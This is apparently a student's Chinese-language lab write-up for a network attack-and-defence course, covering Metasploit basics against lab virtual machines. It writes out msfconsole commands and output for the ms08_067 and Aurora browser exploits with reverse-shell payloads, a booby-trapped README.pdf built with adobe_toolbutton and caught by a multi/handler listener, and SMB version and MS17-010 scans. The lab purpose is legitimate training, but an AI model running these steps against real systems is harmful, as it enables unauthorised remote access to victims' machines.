20155201 网络攻防技术 实验五 MSF基础应用

一、实践内容

  • 一个主动攻击实践,如ms08_067
  • 一个针对浏览器的攻击,如ms11_050
  • 一个针对客户端的攻击,如Adobe
  • 成功应用任何一个辅助模块

二、报告内容:

1. 基础问题回答

1)用自己的话解释什么是exploit,payload,encode.

  1. exploit:把负责攻击靶机的代码或者程序传送到靶机上
  2. payload:载荷,exploit传送的内容
  3. encode:编码方式,可以修改载荷的编码方式让载荷不容易被发现。

2)离实战还缺什么步骤

那个adobe的实践令我眼前一亮,不过其实首先要先与被攻击的电脑在同一网段,其次需要他的操作系统和reader等级都不高,还没打过补丁,这在现实中不太可能存在。。想要成为高手还是得自己找软件的漏洞,还是需要学习。。

2. 实践总结与体会

本次实验的重点在于实践,对于辅助模块的了解、查看文档、说明和使用,通过对msfconsolo命令的操作和使用,对其更加了解和熟练。

3. 实践过程记录

  1. 一个主动攻击实践,如ms08_067
  2. 一个针对浏览器的攻击,如ms11_050
  3. 一个针对客户端的攻击,如Adobe
  4. 成功应用任何一个辅助模块

一个主动攻击实践,如ms08_067

  1. 在kali终端中,输入msfconsole以进入metasploit的控制台

  2. 进入msfconsole中,在msf模式下查找与其相关的漏洞攻击程序search ms08_067,看到exploit/windows/smb/ms08_067_netapi的信息

use exploit/windows/smb/ms08_067_netapi  \\使用模块
set payload generic/shell_reverse_tcp \\设置载荷种类,通过反向连接来获取shell的generic/shell_reverse_tcp当payload
set LHOST 10.211.55.5
set LPORT 5201
set RHOST 10.211.55.12
exploit
  1. 这里攻击失败了

想起来还没ping过,ping了一下没通,尝试关闭Windows XP防火墙

  1. 攻击成功,得到一个shell,查看系统信息

一个针对浏览器的攻击,如ms11_050

先选用ms11_050模块,攻击win7 ie8,结果ie停止工作。。



  1. 在msf模式下查找与其相关的漏洞攻击程序search ms10_002,看到exploit/windows/browser/ms10_002_aurora的信息

  2. 设置参数

msf exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
//payload => windows/meterpreter/reverse_tcp
msf exploit(windows/browser/ms10_002_aurora) > set LHOST 10.211.55.5
//LHOST => 10.211.55.5
msf exploit(windows/browser/ms10_002_aurora) > set LPORT 5201
//LPORT => 5201
msf exploit(windows/browser/ms10_002_aurora) > set URIPATH lzw
//URIPATH => lzw
msf exploit(windows/browser/ms10_002_aurora) > exploit
  1. 使用exploit指令执行漏洞,可以看到生成了一个url:

  2. 在当前会话输入sessions -i, 4(具体数值是多少看自己的当前会话)成功获取靶机的shell,可以对其进行操作

一个针对客户端的攻击,如adobe_toolbutton

  1. 同样套路 ,先search adobe
  2. 设置参数
msf > use exploit/windows/fileformat/adobe_toolbutton
msf exploit(windows/fileformat/adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
//payload => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_toolbutton) > set LHOST 10.211.55.5
//LHOST => 10.211.55.5
msf exploit(windows/fileformat/adobe_toolbutton) > set LPORT 5201
//LPORT => 5201
msf exploit(windows/fileformat/adobe_toolbutton) > set FILENAME README.pdf
//FILENAME => README.pdf
  1. 之后查看一下相关设置

  2. exploit一下

[*] Creating 'README.pdf' file...
[+] README.pdf stored at /root/.msf4/local/README.pdf

记下来生成pdf的位置,直接cp拷出来,然后往xp里面一拖

cp /root/.msf4/local/README.pdf ~
[*] exec: cp /root/.msf4/local/README.pdf ~
  1. 使用exploit/multi/handler模块监听xp
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
//payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.211.55.5
//LHOST => 10.211.55.5
msf exploit(multi/handler) > set LPORT 5201
//LPORT => 5201
msf exploit(multi/handler) > exploit
  1. 下载adobe reader,将拷贝出来的载荷pdf打开,回连成功

成功应用任何一个辅助模块

  1. metasploit模块目录里面看看/usr/share/metasploit-framework/modules
  2. 先选个auxiliary/scanner/smb/smb_version,这个模块的作用是扫描操作系统信息

    查看一下需要设置哪些参数:

扫描范围,线程数

3. 设置参数,包括扫描范围

msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(scanner/smb/smb_version) > set threads 8
threads => 8
msf auxiliary(scanner/smb/smb_version) > run [+] 10.211.55.6:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:C3F2) (workgroup:WORKGROUP )
[*] 10.211.55.2:445 - Host could not be identified: ()
[*] Scanned 26 of 256 hosts (10% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

扫描操作系统结果:windows 7 Professional SP1,设备名C3F2



4. 其实做上面的辅助模块之前我本来是想做一个永恒之蓝漏洞的。。

永恒之蓝是指2017年5月12日起,全球范围内爆发的基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。——from百度百科,windows/smb/ms17_010_eternalblue这个,但是我发现怎么都不成

5. 然后有一个辅助扫描是可以扫描主机是否具有该漏洞和被攻击的可能性,我扫描了下,结果。。没有。。。。

6. 辅助模块auxiliary/scanner/smb/smb_ms17_010

设置参数只需设置主机网段,之后run就可以了

msf exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.211.55.6
//RHOSTS => 10.211.55.6
msf auxiliary(scanner/smb/smb_ms17_010) > run [-] 10.211.55.6:445 - Host does NOT appear vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

没有永恒之蓝的漏洞,不知该哭还是该笑。。

20155201 网络攻防技术 实验五 MSF基础应用的更多相关文章

  1. 20155201 网络攻防技术 实验八 Web基础

    20155201 网络攻防技术 实验八 Web基础 一.实践内容 Web前端HTML,能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML. We ...

  2. 20155235 《网络攻防》 实验五 MSF基础应用

    20155235 <网络攻防> 实验五 MSF基础应用 实验内容 一个主动攻击实践,如ms08_067; (1分) 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击 ...

  3. 20155201 网络攻防技术 实验九 Web安全基础

    20155201 网络攻防技术 实验九 Web安全基础 一.实践内容 本实践的目标理解常用网络攻击技术的基本原理.Webgoat实践下相关实验. 二.报告内容: 1. 基础问题回答 1)SQL注入攻击 ...

  4. 2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_rev ...

  5. 2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165312<网络攻防技术>Exp5 MSF基础应用 目录 一.知识点总结 二.攻击实例 主动攻击的实践 ms08_067 payload/generic/sh ...

  6. 2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165315<网络攻防技术>Exp5 MSF基础应用 目录 一.实验内容 二.实验步骤 1.一个主动攻击实践 ms08_067(成功) 2.一个针对浏览器的攻击 ...

  7. 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...

  8. 2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165332<网络攻防技术>Exp5 MSF基础应用 1.基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是 ...

  9. 2018-2019-2 20165323《网络攻防技术》Exp5 MSF基础应用

    一.知识点总结 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六种模块 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode&qu ...

随机推荐

  1. Redis:redis.conf配置

    redis.conf配置: 配置主要分为几类:基础.快照.复制.安全.限制.详细日志.虚拟内存.高级配置.文件包含 ##------------------------------------基础配置 ...

  2. android逆向四则运算

    不断更新 除法: ; bRet = a/b+; return bRet; .text:00001010 a = R0 ; int.text:00001010 b = R1 ; int.text:000 ...

  3. eclipse的调试模式以及断点运行

    先在代码序号处打个点. 点击debug调试模式 然后再点击 如果有打断点,则会在断点处结束,如果没有,会一直一步一步向下直至结束.

  4. redhat7.5在H3C机器上黑屏无显

    现象:H3C机器上,PXE安装/ISO安装系统,多用户模式启动,过内核启动界面后,屏幕黑屏无显,但是可以通过SSH登陆系统,服务正常 环境:redhat7.5/H3C R4900G3/Purely平台 ...

  5. CSU 1838 Water Pump(单调栈)

    Water Pump [题目链接]Water Pump [题目类型]单调栈 &题解: 这题可以枚举缺口,共n-1个,之后把前缀面积和后缀面积用O(n)打一下表,最后总面积减去前缀的i个和后缀的 ...

  6. Unity shader学习之Alpha Blend

    通过 ShaderLab 的 AlphaBlend 能够实现真正的半透明效果. 使用 AlphaBlend 时,需要关闭深度写入 ZWrite Off,但得非常小心物体的渲染顺序, RenderQue ...

  7. Linux 压缩解压缩命令详解

    tar -c: 建立压缩档案-x:解压-t:查看内容-r:向压缩归档文件末尾追加文件-u:更新原压缩包中的文件 这五个是独立的命令,压缩解压都要用到其中一个,可以和别的命令连用但只能用其中一个.下面的 ...

  8. hdu5289 单调队列

    这题说的是给了 n个数 然后让你计算出所有区间中那些数的最大值减最小值小于k这样的区间有多少个 /* 这样我们给我们在处理过程中的区间做一些处理 我们在处理即将进来的数的时候我们并不知道他是不是我们区 ...

  9. 【2017-03-20】HTML框架,标题栏插入小图标,锚点,插入音频视频,滚动效果

    一.html框架   iframe 在网页中嵌入一个别的网页 1.格式: <iframe  src="链接地址" width="" height=&quo ...

  10. Linux中常用的50个命令

    1. [命令]:cat [功能说明]: concatenate files and print on the standard output #连接文件并打印到标准输出,有标准输出的都可以用重定向定向 ...